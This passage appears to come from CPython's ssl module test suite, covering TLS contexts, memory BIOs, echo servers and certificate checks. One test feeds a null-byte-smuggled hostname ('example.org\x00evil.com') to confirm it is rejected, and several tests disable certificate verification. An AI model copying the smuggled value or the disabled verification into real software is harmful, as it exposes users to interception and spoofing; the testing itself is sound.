self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_get_server_certificate_timeout(self):
def servername_cb(ssl_sock, server_name, initial_context):
time.sleep(0.2)
self.server_context.set_servername_callback(servername_cb)
with self.assertRaises(socket.timeout):
ssl.get_server_certificate(self.server_addr, ca_certs=SIGNING_CA,
timeout=0.1)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
if cert_binary is None:
sys.stdout.write(" client did not provide a cert\n")
else:
sys.stdout.write(f" cert binary is {len(cert_binary)}b\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError as e:
# handles SSLError and socket errors
if self.server.chatty and support.verbose:
if isinstance(e, ConnectionError):
# OpenSSL 1.1.1 sometimes raises
# ConnectionResetError when connection is not
# shut down gracefully.
print(
f" Connection reset by peer: {self.addr}"
)
else:
handle_error("Test server failure:\n")
try:
self.write(b"ERROR\n")
except OSError:
pass
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
